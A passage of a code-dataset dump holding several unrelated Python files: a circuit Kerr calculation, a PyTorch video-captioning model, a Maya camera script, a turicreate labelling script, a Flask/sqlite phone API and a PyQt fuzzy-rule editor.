\"+str(1e-9*self.EJ/hbar/2/pi)+\" GHz\")\n print(\"phi_zpf = \"+str(phi))\n print(\"n_zpf = \"+str(n_zpf))\n print(\"CJ per junction = \"+str(CJ*1e15)+str(\" fF\"))\n print('')\n# print(\"kappab/kappaa limited by CJ = \"+str(1/kappaa_over_kappab))\n \n # Maximum order of the expansion. 4 for Kerr terms\n self.max_order = 4\n super().__init__()\n\n\n def get_freqs_kerrs(self, **kwargs):\n\n res = self.get_normal_mode_frame(**kwargs)\n res1, res2, P, w2 = res\n fs = np.sqrt(w2)/2/np.pi\n\n # calculate Kerrs from polynomial approximation of potential\n\n Hess2U = self.get_HessnL('U', 2, **kwargs)\n Hess3U = self.get_HessnL('U', 3, **kwargs)\n Hess4U = self.get_HessnL('U', 4, **kwargs)\n\n Hess2_r = Hess2U([res1[0], res1[1]], P=P)\n Hess3_r = Hess3U([res1[0], res1[1]], P=P)\n Hess4_r = Hess4U([res1[0], res1[1]], P=P)\n\n popt2 = np.array([Hess2_r[0, 0]/2, Hess2_r[1, 1]/2])\n popt3 = np.array([Hess3_r[0, 0, 0]/6, Hess3_r[1, 1, 1]/6]) # coeff devant le phi**3\n popt4 = np.array([Hess4_r[0, 0, 0, 0]/24, Hess4_r[1, 1, 1, 1]/24]) # coeff devant le phi**4\n\n\n ZPF = popt2**(-1./4)\n\n Xi2 = popt2*(ZPF**2)/2/np.pi # freq en Hz\n Xi3 = 2 * popt3*(ZPF**3)/2/np.pi #coeff devant a^2.a^+\n Xi4 = 6 * popt4*(ZPF**4)/2/np.pi #coeff devant a^2.a^+2\n\n check_Xi2 = w2**0.5/2/np.pi\n\n return res1, res2, Xi2, Xi3, Xi4, check_Xi2\n\n def get_freqs_only(self, **kwargs):\n res = self.get_normal_mode_frame(**kwargs)\n res1, res2, P, w2 = res\n fs = np.sqrt(w2)/2/np.pi\n return fs\n","sub_path":"circuit_example.py","file_name":"circuit_example.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"411604870","text":"# coding: utf-8\n\n'''\n利用显著图来做Temporal Attention,对视频内容进行筛选\n'''\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torchvision.models as models\nfrom builtins import range\nfrom args import vgg_checkpoint\nimport random\nimport math\n\n\nclass EncoderCNN(nn.Module):\n\n def __init__(self):\n super(EncoderCNN, self).__init__()\n self.vgg = models.vgg16()\n self.vgg.load_state_dict(torch.load(vgg_checkpoint))\n # 把VGG的最后一个fc层(其之前的ReLU层要保留)剔除掉\n self.vgg.classifier = nn.Sequential(*list(self.vgg.classifier.children())[:-1])\n\n def forward(self, images):\n return self.vgg(images)\n\n\nclass AttentionLayer(nn.Module):\n '''\n 根据LSTM的隐层状态和视频帧的CNN特征来确定该帧的权重\n '''\n def __init__(self, hidden_size, projected_size):\n '''\n hidden_size: LSTM的隐层单元数目\n frame_embed_size: CNN特征的嵌入维度\n projected_size: 处理LSTM特征和CNN特征的投影空间的维度\n '''\n super(AttentionLayer, self).__init__()\n self.hidden_size = hidden_size\n self.projected_size = projected_size\n self.linear1 = nn.Linear(hidden_size, projected_size)\n self.linear2 = nn.Linear(projected_size, projected_size)\n self.linear3 = nn.Linear(projected_size, 1, bias=False)\n\n def forward(self, h, v):\n bsz, num_frames = v.size()[:2]\n e = []\n for i in range(num_frames):\n x = self.linear1(h) + self.linear2(v[:, i, :])\n x = F.tanh(x)\n x = self.linear3(x)\n e.append(x)\n e = torch.cat(e, 0)\n a = F.softmax(e.view(bsz, num_frames))\n return a\n\n\nclass DecoderRNN(nn.Module):\n\n def __init__(self, frame_size, projected_size, hidden_size,\n num_frames, num_words, vocab):\n '''\n frame_size: 视频帧的特征的大小,一般是4096(VGG的倒数第二个fc层)\n projected_size: 所有特征的投影维度\n hidden_size: LSTM的隐层单元个数\n num_frames: 视觉特征的序列长度,默认是60\n num_words: 文本特征的序列长度,默认是30\n '''\n super(DecoderRNN, self).__init__()\n\n self.frame_size = frame_size\n 
self.hidden_size = hidden_size\n        self.num_frames = num_frames\n        self.num_words = num_words\n        self.projected_size = projected_size\n        self.vocab = vocab\n        self.vocab_size = len(vocab)\n\n        # frame_embed用来把视觉特征嵌入到低维空间\n        self.vs_frame_embed = nn.Linear(frame_size, projected_size)\n        self.vs_frame_drop = nn.Dropout(p=0.8)\n        self.vf_frame_embed = nn.Linear(frame_size, projected_size)\n        self.vf_frame_drop = nn.Dropout(p=0.8)\n        self.frame_embed = nn.Linear(projected_size * 2, projected_size)\n        self.frame_drop = nn.Dropout(p=0.8)\n\n        # attend_layer用来做temporal attention\n        self.attend_layer = AttentionLayer(hidden_size, projected_size)\n\n        # word_embed用来把文本特征嵌入到低维空间\n        self.word_embed = nn.Embedding(self.vocab_size, projected_size)\n        self.word_drop = nn.Dropout(p=0.8)\n\n        # lstm作为解码器\n        self.lstm_cell = nn.LSTMCell(projected_size, hidden_size)\n        self.lstm_drop = nn.Dropout(p=0.8)\n        # inith用来初始化lstm的hidden\n        self.inith = nn.Sequential(\n            nn.Linear(projected_size, hidden_size),\n            nn.Tanh(),\n            nn.Linear(hidden_size, hidden_size),\n            nn.Tanh()\n        )\n        # initc用来初始化lstm的cell\n        self.initc = nn.Sequential(\n            nn.Linear(projected_size, hidden_size),\n            nn.Tanh(),\n            nn.Linear(hidden_size, hidden_size),\n            nn.Tanh(),\n        )\n\n        # linear用来把lstm的最终输出映射回文本空间\n        self.linear = nn.Linear(hidden_size, self.vocab_size)\n\n        self._init_weights()\n\n    def _init_weights(self):\n        variance = math.sqrt(2.0 / (self.frame_size + self.projected_size))\n        self.vs_frame_embed.weight.data.normal_(0.0, variance)\n        self.vs_frame_embed.bias.data.zero_()\n        self.vf_frame_embed.weight.data.normal_(0.0, variance)\n        self.vf_frame_embed.bias.data.zero_()\n        self.word_embed.weight.data.uniform_(-1.73, 1.73)\n        self.linear.weight.data.uniform_(-0.08, 0.08)\n        self.linear.bias.data.zero_()\n\n    def _init_lstm_state(self, v):\n        mean_v = torch.mean(v, 1).squeeze(1)\n        lstm_hidden = F.tanh(self.inith(mean_v))\n        lstm_cell = F.tanh(self.initc(mean_v))\n        return lstm_hidden, lstm_cell\n\n    def forward(self, video_feats, captions, teacher_forcing_ratio=0.5):\n        '''\n        传入视频帧特征和caption,返回生成的caption\n        不用teacher forcing模式(LSTM的输入来自caption的ground-truth)来训练\n        而是用上一步的生成结果作为下一步的输入\n        UPDATED: 最后还是采用了混合的teacher forcing模式,不然很难收敛\n        '''\n        batch_size = len(video_feats)\n        # 根据是否传入caption判断是否是推断模式\n        infer = True if captions is None else False\n\n        # Encoding 阶段!\n        # vs是视频帧的saliency区域的特征\n        vs = video_feats[:, :, :self.frame_size].contiguous()\n        vs = vs.view(-1, self.frame_size)\n        vs = self.vs_frame_embed(vs)\n        vs = self.vs_frame_drop(vs)\n        vs_ = vs.view(batch_size, self.num_frames, -1)\n        # vf是视频帧的完整特征\n        vf = video_feats[:, :, self.frame_size:].contiguous()\n        vf = vf.view(-1, self.frame_size)\n        vf = self.vf_frame_embed(vf)\n        vf = self.vf_frame_drop(vf)\n        # vf_ = vf_.view(batch_size, self.num_frames, -1)\n        # vr是视频完整特征与显著区域特征的残差\n        vr = vf - vs\n        # v是视频的著特征与残差特征的拼接\n        v = torch.cat([vs, vr], 1)\n        v = self.frame_embed(v)\n        v = v.view(batch_size, self.num_frames, -1)\n\n        # 初始化LSTM隐层\n        lstm_hidden, lstm_cell = self._init_lstm_state(v)\n\n        # Decoding 阶段!\n        # 开始准备输出啦!\n        outputs = []\n        attens = []\n        # 先送一个<start>标记\n        word_id = self.vocab('<start>')\n        word = Variable(vs.data.new(batch_size, 1).long().fill_(word_id))\n        word = self.word_embed(word).squeeze(1)\n        word = self.word_drop(word)\n\n        for i in range(self.num_words):\n            if not infer and captions[:, i].data.sum() == 0:\n                # <pad>的id是0,如果所有的word id都是0,\n                # 意味着所有的句子都结束了,没有必要再算了\n                break\n            a = self.attend_layer(lstm_hidden, vs_)\n            if infer:\n                attens.append(a)\n            a = a.unsqueeze(1)\n            # 考虑视频的完整特征与显著区域特征的拼接\n            V = torch.bmm(a, v).squeeze(1)\n\n            t = word + V\n            lstm_hidden, 
lstm_cell = self.lstm_cell(t, (lstm_hidden, lstm_cell))\n            lstm_hidden = self.lstm_drop(lstm_hidden)\n\n            word_logits = self.linear(lstm_hidden)\n            use_teacher_forcing = random.random() < teacher_forcing_ratio\n            if use_teacher_forcing:\n                # teacher forcing模式\n                word_id = captions[:, i]\n            else:\n                # 非 teacher forcing模式\n                word_id = word_logits.max(1)[1]\n            if infer:\n                # 如果是推断模式,直接返回单词id\n                outputs.append(word_id)\n            else:\n                # 否则是训练模式,要返回logits\n                outputs.append(word_logits)\n            # 确定下一个输入单词的表示\n            word = self.word_embed(word_id).squeeze(1)\n            word = self.word_drop(word)\n        # unsqueeze(1)会把一个向量(n)拉成列向量(nx1)\n        # outputs中的每一个向量都是整个batch在某个时间步的输出\n        # 把它拉成列向量之后再横着拼起来,就能得到整个batch在所有时间步的输出\n        outputs = torch.cat([o.unsqueeze(1) for o in outputs], 1).contiguous()\n        return outputs, attens\n\n    def sample(self, video_feats):\n        '''\n        sample就是不给caption且不用teacher forcing的forward\n        '''\n        return self.forward(video_feats, None, teacher_forcing_ratio=0.0)\n\n    def decode_tokens(self, tokens):\n        '''\n        根据word id(token)列表和给定的字典来得到caption\n        '''\n        words = []\n        for token in tokens:\n            if token == self.vocab('<end>'):\n                break\n            word = self.vocab.idx2word[token]\n            words.append(word)\n        caption = ' '.join(words)\n        return caption\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"460826533","text":"#!/bin/python\n\nimport sys\nimport re\n\ndef main(args):\n    frames_dict = dict()\n    with open(args[1], 'r') as f:\n        parse_frames = False\n        for cnt, line in enumerate(f):\n            if line.startswith(\"\\n\"):\n                parse_frames = False\n                continue\n            line = line.strip()\n            if not parse_frames and not line.startswith(\"Frame\"):\n                continue\n            if line.startswith(\"Frame\"):\n                match = re.match(\"Frame (0x[0-9a-fA-F]+) \", line)\n                frame_addr = match.group(1)\n                parse_frames = True\n                frames_dict[frame_addr] = list()\n                continue\n            for frame in line.split():\n                frames_dict[frame_addr].append(\"0x\" + frame)\n    for addr, words in frames_dict.items():\n        print(\"{addr} {words}\".format(addr=addr, words=\",\".join(words)))\n\nif __name__ == \"__main__\":\n    main(sys.argv)\n","sub_path":"ExtractFrames.py","file_name":"ExtractFrames.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"523542461","text":"from maya import cmds, mel\n\n\n\n\n\n\ndef make_vector(start, end):\n    return unitize(start - end)\n\n\ndef make_camera(position, rotation=None, target=None):\n    \"\"\"\n    Create a camera.\n    \"\"\"\n\n    if target and rotation is None:\n        rotation = make_vector(position, target)\n\n    c = cmds.camera(position=position, rotation=rotation)\n    #c = cmds.camera(position=[0,13,0], rotation=[-90,0,0])\n\n    # focalLength = cmds.camera(cameraShape, q=True, fl=True) # Change the film fit type.\n    # cmds.camera( cameraShape, e=True, ff='overscan' )\n\n\n\n\ndef main():\n\n    panels = cmds.getPanel( all=True )\n    cmds.lookThru(c[0])\n\n    cmds.setKeyframe(c[0], attribute='translateY', t=['0sec',], value=20)\n    cmds.setKeyframe(c[0], attribute='translateY', t=['15sec',], value=0)\n\n    cmds.setKeyframe(c[0], attribute='translateZ', t=['3sec',], value=0)\n    cmds.setKeyframe(c[0], attribute='translateZ', t=['9sec',], value=20)\n\n    cmds.setKeyframe(c[0], attribute='rotateX', t=['0sec',], value=-90)\n    cmds.setKeyframe(c[0], attribute='rotateX', t=['15sec',], 
value=0)\n\n\n\n\n","sub_path":"src/py/render/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"363921274","text":"import turicreate as tc\n\n# Load images (Note: you can ignore 'Not a JPEG file' errors)\ndata = tc.image_analysis.load_images('DATA', with_path=True)\n\n# From the path-name, create a label column\ndata['label'] = data['path'].apply(lambda path: 'wheel' if '/wheel' in path else ('mmb' if '/mmb' in path else 'taillight'))\n\n# Save the data for future use\ndata.save('parts.sframe')\n\n# Explore interactively\ndata.explore()\n","sub_path":"ML_Py/database_gen.py","file_name":"database_gen.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"647922340","text":"from flask import Flask, request\nfrom utils import read_requirements\nfrom utils import random_users\nfrom utils import average_weight_and_height\nfrom utils import mans_in_space_now\n\napp = Flask(\"MyApplication\")\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n\n@app.route('/requirements/')\ndef requiremets():\n return read_requirements()\n\n\n@app.route('/generate-users/')\ndef generate_users():\n query_params = request.args\n default_number_user = 100\n minimum_number_user = 1\n maximum_number_user = 1000\n number_user = query_params.get('number_user') or ''\n if number_user.isdigit():\n number_user = int(number_user)\n if number_user < minimum_number_user or number_user > maximum_number_user:\n number_user = default_number_user\n else:\n number_user = default_number_user\n return random_users(number_user)\n\n\n@app.route('/mean/')\ndef average_output():\n return average_weight_and_height()\n\n@app.route('/space/')\ndef mans_in_space():\n return mans_in_space_now()\n\n@app.route('/phone/create/')\ndef phone_create():\n\n query_params = request.args\n value = int(query_params.get('value'))\n\n\n import sqlite3\n\n con = sqlite3.connect(\"./phones.db\")\n cur = con.cursor()\n sql = f\"\"\"\n INSERT INTO phones\n values (null, {value})\n \"\"\"\n cur.execute(sql)\n con.commit()\n con.close()\n return 'Phone was Created'\n\n@app.route('/phone/delete/')\ndef phones_delete():\n\n import sqlite3\n\n con = sqlite3.connect(\"./phones.db\")\n cur = con.cursor()\n sql = \"\"\"\n DELETE FROM phones;\n \"\"\"\n cur.execute(sql)\n con.commit()\n con.close()\n return 'All phones were deleted'\n\n@app.route('/phone/list/')\ndef phone_list():\n\n import sqlite3\n\n con = sqlite3.connect(\"./phones.db\")\n cur = con.cursor()\n sql = \"\"\"\n SELECT * FROM phones;\n \"\"\"\n cur.execute(sql)\n phones_list = cur.fetchall()\n con.close()\n return str(phones_list)\n\n@app.route('/phone/update/')\ndef phones_update():\n query_params = request.args\n value = int(query_params.get('value'))\n\n import sqlite3\n\n con = sqlite3.connect(\"./phones.db\")\n cur = con.cursor()\n sql = f\"\"\"\n UPDATE phones SET value={value};\n \"\"\"\n cur.execute(sql)\n con.commit()\n con.close()\n return 'All phones were updated'\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"231136280","text":"#!/usr/bin/env python\n\nimport psycopg2\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QDoubleValidator\nfrom PyQt5.QtWidgets 
import QApplication\nfrom PyQt5.QtWidgets import QMainWindow\nfrom PyQt5.QtWidgets import QListWidgetItem\nfrom PyQt5.QtWidgets import QTreeWidgetItem\nfrom PyQt5.QtWidgets import QTableWidgetItem\nfrom PyQt5.uic import loadUi\n\nclass Window(QMainWindow):\n def __init__(self, *args, host, port, database, username, password):\n super(Window, self).__init__(*args)\n\n self.conn = psycopg2.connect(host=host, port=port, database=database, user=username, password=password)\n\n loadUi('expert.ui', self)\n\n # Initialize variables tab\n\n self.fillComboWithLemmas(self.uiVariablesCombo, 'variables')\n self.uiVariablesCombo.currentIndexChanged.connect(self.onVariableSelected)\n self.uiCreateVariableButton.clicked.connect(self.onCreateVariableClicked)\n self.uiRenameVariableButton.clicked.connect(self.onRenameVariableClicked)\n self.uiDeleteVariableButton.clicked.connect(self.onDeleteVariableClicked)\n\n self.uiVariableVerifiedCheck.stateChanged.connect(self.onVariableVerified)\n self.uiRangeMinEdit.textEdited.connect(self.checkChanges)\n self.uiRangeMaxEdit.textEdited.connect(self.checkChanges)\n\n self.loadTerms()\n self.uiTermsCombo.currentIndexChanged.connect(self.onTermSelected)\n self.uiAddTermButton.clicked.connect(self.onAddTermClicked)\n self.uiTermsList.clicked.connect(self.onVariableTermSelected)\n self.uiRemoveTermButton.clicked.connect(self.onRemoveTermClicked)\n\n self.loadHedges()\n self.uiHedgesCombo.currentTextChanged.connect(self.onHedgeSelected)\n self.uiAddHedgeButton.clicked.connect(self.onAddHedgeClicked)\n self.uiHedgesList.clicked.connect(self.onVariableHedgeSelected)\n self.uiRemoveHedgeButton.clicked.connect(self.onRemoveHedgeClicked)\n\n self.uiCommitVariableButton.clicked.connect(self.commitVariable)\n\n # Initialize terms tab\n\n self.fillComboWithLemmas(self.uiTerms2Combo, 'terms')\n self.uiTerms2Combo.currentIndexChanged.connect(self.onTerm2Selected)\n self.uiCreateTermButton.clicked.connect(self.onCreateTermClicked)\n self.uiRenameTermButton.clicked.connect(self.onRenameTermClicked)\n self.uiDeleteTermButton.clicked.connect(self.onDeleteTermClicked)\n\n self.uiTermVerifiedCheck.stateChanged.connect(self.onTermVerified)\n\n self.fillComboWithNames(self.uiFunctionCombo, 'functions')\n self.uiFunctionCombo.currentIndexChanged.connect(self.onFunctionSelected)\n\n self.uiPointsEdit.textEdited.connect(self.checkPoints)\n\n self.uiCommitTermButton.clicked.connect(self.commitTerm)\n\n # Initialize hedges tab\n\n self.fillComboWithLemmas(self.uiHedges2Combo, 'hedges')\n self.uiHedges2Combo.currentIndexChanged.connect(self.onHedge2Selected)\n self.uiCreateHedgeButton.clicked.connect(self.onCreateHedgeClicked)\n self.uiRenameHedgeButton.clicked.connect(self.onRenameHedgeClicked)\n self.uiDeleteHedgeButton.clicked.connect(self.onDeleteHedgeClicked)\n\n self.uiHedgeVerifiedCheck.stateChanged.connect(self.onHedgeVerified)\n\n self.uiResultEdit.textEdited.connect(self.checkResult)\n\n self.uiCommitHedgeButton.clicked.connect(self.commitHedge)\n\n # Initialize rules tab\n\n self.fillComboWithNames(self.uiRulesCombo, 'rules')\n self.uiRulesCombo.currentIndexChanged.connect(self.onRuleSelected)\n self.uiCreateRuleButton.clicked.connect(self.onCreateRuleClicked)\n self.uiRenameRuleButton.clicked.connect(self.onRenameRuleClicked)\n self.uiDeleteRuleButton.clicked.connect(self.onDeleteRuleClicked)\n\n self.uiRuleVerifiedCheck.stateChanged.connect(self.onRuleVerified)\n \n self.uiNoteEdit.textEdited.connect(self.onNoteEdited)\n\n 
self.uiAntecedentNodeTypesCombo.currentIndexChanged.connect(self.onAntecedentNodeTypeSelected)\n self.uiAntecedentNodesCombo.currentIndexChanged.connect(self.onAntecedentNodeValueSelected)\n self.uiAddAntecedentNodeButton.clicked.connect(self.onAddAntecedentNodeClicked)\n self.uiAntecedentTree.currentItemChanged.connect(self.onAntecedentNodeSelected)\n self.uiRemoveAntecedentNodeButton.clicked.connect(self.onRemoveAntecedentNodeClicked)\n\n self.uiConsequentNodeTypesCombo.currentIndexChanged.connect(self.onConsequentNodeTypeSelected)\n self.uiConsequentNodesCombo.currentIndexChanged.connect(self.onConsequentNodeValueSelected)\n self.uiAddConsequentNodeButton.clicked.connect(self.onAddConsequentNodeClicked)\n self.uiConsequentTree.currentItemChanged.connect(self.onConsequentNodeSelected)\n self.uiRemoveConsequentNodeButton.clicked.connect(self.onRemoveConsequentNodeClicked)\n\n self.uiCommitRuleButton.clicked.connect(self.commitRule)\n\n # Initialize debug tab\n\n self.uiModeCombo.addItem('Переменные', 0)\n self.uiModeCombo.addItem('Термы', 1)\n self.uiModeCombo.addItem('Модификаторы', 2)\n self.uiModeCombo.addItem('Переменные и термы', 3)\n self.uiModeCombo.addItem('Переменные и модификаторы', 4)\n self.uiModeCombo.addItem('Синонимы', 5)\n self.uiModeCombo.addItem('Правила', 6)\n self.uiModeCombo.addItem('Узлы', 7)\n self.uiModeCombo.currentIndexChanged.connect(self.onModeSelected)\n self.uiModeCombo.setCurrentIndex(-1)\n\n # Initialize main window\n\n self.uiTabs.setCurrentIndex(0)\n self.uiTabs.currentChanged.connect(self.onTabChanged)\n\n def getLemmas(self, group):\n cur = self.conn.cursor()\n cur.execute('SELECT lemma FROM synonims WHERE group_id = %s ORDER BY hits DESC;', (group,))\n lemmas = []\n for row in cur.fetchall():\n lemmas.append(row[0])\n cur.close()\n return lemmas\n\n def fillComboWithLemmas(self, combo, table):\n combo.clear()\n cur = self.conn.cursor()\n cur.execute('SELECT id, name, name_id FROM %s;' % table)\n for row in cur.fetchall():\n if (row[1] != ''):\n combo.addItem(row[1], row[0])\n else:\n combo.addItem(', '.join(self.getLemmas(row[2])), row[0])\n cur.close()\n combo.setCurrentIndex(-1)\n\n def fillComboWithNames(self, combo, table):\n combo.clear()\n cur = self.conn.cursor()\n cur.execute('SELECT id, name FROM %s;' % table)\n for row in cur.fetchall():\n combo.addItem(row[1], row[0])\n cur.close()\n combo.setCurrentIndex(-1)\n\n # Actions on variables tab\n\n def loadTerms(self):\n self.fillComboWithLemmas(self.uiTermsCombo, 'terms')\n self.uiAddTermButton.setEnabled(False)\n\n def loadHedges(self):\n self.fillComboWithLemmas(self.uiHedgesCombo, 'hedges')\n self.uiAddHedgeButton.setEnabled(False)\n\n def onVariableSelected(self):\n if (self.uiVariablesCombo.isEditable() == True):\n return\n\n self.uiTermsCombo.setCurrentIndex(-1)\n self.uiAddTermButton.setEnabled(False)\n self.uiRemoveTermButton.setEnabled(False)\n self.uiHedgesCombo.setCurrentIndex(-1)\n self.uiAddHedgeButton.setEnabled(False)\n self.uiRemoveHedgeButton.setEnabled(False)\n self.uiCommitVariableButton.setEnabled(False)\n self.uiVariableVerifiedCheck.setChecked(False)\n self.uiRangeMinEdit.clear()\n self.uiRangeMaxEdit.clear()\n self.uiTermsList.clear()\n self.uiHedgesList.clear()\n\n if (self.uiVariablesCombo.currentIndex() == -1):\n self.uiRenameVariableButton.setEnabled(False)\n self.uiDeleteVariableButton.setEnabled(False)\n self.uiVariableVerifiedCheck.setEnabled(False)\n self.uiRangeMinEdit.setEnabled(False)\n self.uiRangeMaxEdit.setEnabled(False)\n 
self.uiTermsCombo.setEnabled(False)\n self.uiTermsList.setEnabled(False)\n self.uiHedgesCombo.setEnabled(False)\n self.uiHedgesList.setEnabled(False)\n return\n\n self.variableRenamed = False\n\n if (self.uiVariablesCombo.currentData() != 0):\n cur = self.conn.cursor()\n cur.execute('SELECT terms.id, terms.name, terms.name_id FROM variables, terms, variables_terms WHERE variables.id = %s AND variables.id = variables_terms.variable_id AND terms.id = variables_terms.term_id;', (self.uiVariablesCombo.currentData(),))\n for row in cur.fetchall():\n if (row[1] != ''):\n item = QListWidgetItem(row[1])\n else:\n item = QListWidgetItem(', '.join(self.getLemmas(row[2])))\n item.setData(Qt.UserRole, row[0])\n self.uiTermsList.addItem(item)\n cur.close()\n self.loadTerms()\n\n cur = self.conn.cursor()\n cur.execute('SELECT hedges.id, hedges.name, hedges.name_id FROM variables, hedges, variables_hedges WHERE variables.id = %s AND variables.id = variables_hedges.variable_id AND hedges.id = variables_hedges.hedge_id;', (self.uiVariablesCombo.currentData(),))\n for row in cur.fetchall():\n if (row[1] != ''):\n item = QListWidgetItem(row[1])\n else:\n item = QListWidgetItem(', '.join(self.getLemmas(row[2])))\n item.setData(Qt.UserRole, row[0])\n self.uiHedgesList.addItem(item)\n cur.close()\n self.loadHedges()\n\n cur = self.conn.cursor()\n cur.execute('SELECT min, max FROM variables WHERE id = %s;', (self.uiVariablesCombo.currentData(),))\n range = cur.fetchone()\n if (range):\n self.uiRangeMinEdit.setText('%s' % range[0])\n self.uiRangeMaxEdit.setText('%s' % range[1])\n\n cur = self.conn.cursor()\n cur.execute('SELECT validated FROM variables WHERE id = %s;', (self.uiVariablesCombo.currentData(),))\n state = cur.fetchone()\n if (state[0] == True):\n self.uiVariableVerifiedCheck.setChecked(True);\n\n self.uiRenameVariableButton.setEnabled(True)\n self.uiDeleteVariableButton.setEnabled(True)\n self.uiVariableVerifiedCheck.setEnabled(True)\n self.uiRangeMinEdit.setEnabled(True)\n self.uiRangeMaxEdit.setEnabled(True)\n self.uiTermsCombo.setEnabled(True)\n self.uiTermsList.setEnabled(True)\n self.uiHedgesCombo.setEnabled(True)\n self.uiHedgesList.setEnabled(True)\n\n def onTermSelected(self):\n self.uiAddTermButton.setEnabled(True)\n\n def onVariableTermSelected(self):\n self.uiRemoveTermButton.setEnabled(True)\n\n def onAddTermClicked(self):\n found = False\n for index in range(self.uiTermsList.count()):\n if (self.uiTermsList.item(index).data(Qt.UserRole) == self.uiTermsCombo.currentData()):\n found = True\n break\n if (not found):\n item = QListWidgetItem(self.uiTermsCombo.currentText())\n item.setData(Qt.UserRole, self.uiTermsCombo.currentData())\n self.uiTermsList.addItem(item)\n self.checkChanges()\n\n def onRemoveTermClicked(self):\n self.uiTermsList.takeItem(self.uiTermsList.currentRow())\n if (self.uiTermsList.count() == 0):\n self.uiRemoveTermButton.setEnabled(False)\n self.checkChanges()\n\n def onHedgeSelected(self):\n self.uiAddHedgeButton.setEnabled(True)\n\n def onVariableHedgeSelected(self):\n self.uiRemoveHedgeButton.setEnabled(True)\n\n def onAddHedgeClicked(self):\n found = False\n for index in range(self.uiHedgesList.count()):\n if (self.uiHedgesList.item(index).data(Qt.UserRole) == self.uiHedgesCombo.currentData()):\n found = True\n break\n if (not found):\n item = QListWidgetItem(self.uiHedgesCombo.currentText())\n item.setData(Qt.UserRole, self.uiHedgesCombo.currentData())\n self.uiHedgesList.addItem(item)\n self.checkChanges()\n\n def onRemoveHedgeClicked(self):\n 
self.uiHedgesList.takeItem(self.uiHedgesList.currentRow())\n if (self.uiHedgesList.count() == 0):\n self.uiRemoveHedgeButton.setEnabled(False)\n self.checkChanges()\n\n def onCreateVariableClicked(self):\n self.currentVariable = -1\n self.uiVariablesCombo.setCurrentIndex(-1)\n self.uiVariablesCombo.setEditable(True)\n self.uiVariablesCombo.lineEdit().returnPressed.connect(self.onVariableEntered)\n self.uiVariablesCombo.setFocus()\n self.uiCreateVariableButton.setEnabled(False)\n\n def onRenameVariableClicked(self):\n self.currentVariable = self.uiVariablesCombo.currentIndex()\n self.uiVariablesCombo.setEditable(True)\n self.uiVariablesCombo.lineEdit().returnPressed.connect(self.onVariableEntered)\n self.uiVariablesCombo.setFocus()\n self.uiCreateVariableButton.setEnabled(False)\n self.uiRenameVariableButton.setEnabled(False)\n self.uiDeleteVariableButton.setEnabled(False)\n\n def onVariableEntered(self):\n self.variableRenamed = False\n self.uiVariablesCombo.setEditable(False)\n self.uiCreateVariableButton.setEnabled(True)\n self.uiRenameVariableButton.setEnabled(True)\n self.uiDeleteVariableButton.setEnabled(True)\n if (self.currentVariable >= 0):\n name = self.uiVariablesCombo.currentText()\n self.uiVariablesCombo.removeItem(self.uiVariablesCombo.currentIndex())\n if (self.uiVariablesCombo.itemText(self.currentVariable) != name):\n self.uiVariablesCombo.setItemText(self.currentVariable, name)\n self.variableRenamed = True\n self.uiVariablesCombo.setCurrentIndex(self.currentVariable)\n self.checkChanges()\n else:\n self.uiVariablesCombo.setCurrentIndex(self.currentVariable)\n else:\n self.uiVariablesCombo.setItemData(self.uiVariablesCombo.currentIndex(), 0)\n self.onVariableSelected()\n\n def onDeleteVariableClicked(self):\n cur = self.conn.cursor()\n cur.execute('DELETE FROM variables WHERE id = %s;', (self.uiVariablesCombo.currentData(),))\n self.conn.commit()\n cur.close()\n self.uiVariablesCombo.removeItem(self.uiVariablesCombo.currentIndex())\n\n def checkChanges(self):\n self.uiCommitVariableButton.setEnabled(True)\n\n def onVariableVerified(self):\n self.checkChanges()\n\n def commitVariable(self):\n if (self.uiRangeMinEdit.text() == ''):\n self.uiRangeMinEdit.setText('-inf')\n if (self.uiRangeMaxEdit.text() == ''):\n self.uiRangeMaxEdit.setText('+inf')\n self.uiCommitVariableButton.setEnabled(False)\n cur = self.conn.cursor()\n variable_id = self.uiVariablesCombo.currentData()\n if (variable_id):\n cur.execute('UPDATE variables SET validated = %s, min = %s, max = %s WHERE id = %s;', \n (self.uiVariableVerifiedCheck.isChecked(), self.uiRangeMinEdit.text(), \n self.uiRangeMaxEdit.text(), variable_id))\n if (self.variableRenamed == True):\n cur.execute('UPDATE variables SET name = %s WHERE id = %s;', (self.uiVariablesCombo.currentText(), variable_id))\n cur.execute('DELETE FROM variables_terms WHERE variable_id = %s;', (variable_id,))\n cur.execute('DELETE FROM variables_hedges WHERE variable_id = %s;', (variable_id,))\n else:\n cur.execute('INSERT INTO groups (is_variable, is_term, is_hedge) VALUES (true, false, false) RETURNING id;')\n group_id = cur.fetchone()[0]\n for lemma in self.uiVariablesCombo.currentText().replace(' ', '').split(','):\n cur.execute('INSERT INTO synonims (group_id, lemma, grammemes, hits) VALUES (%s, %s, %s, 0);', (group_id, lemma, ''));\n cur.execute('INSERT INTO variables (name_id, name, validated, min, max) VALUES (%s, %s, %s, %s, %s) RETURNING id;', \n (group_id, self.uiVariablesCombo.currentText(), self.uiVariableVerifiedCheck.isChecked(), \n 
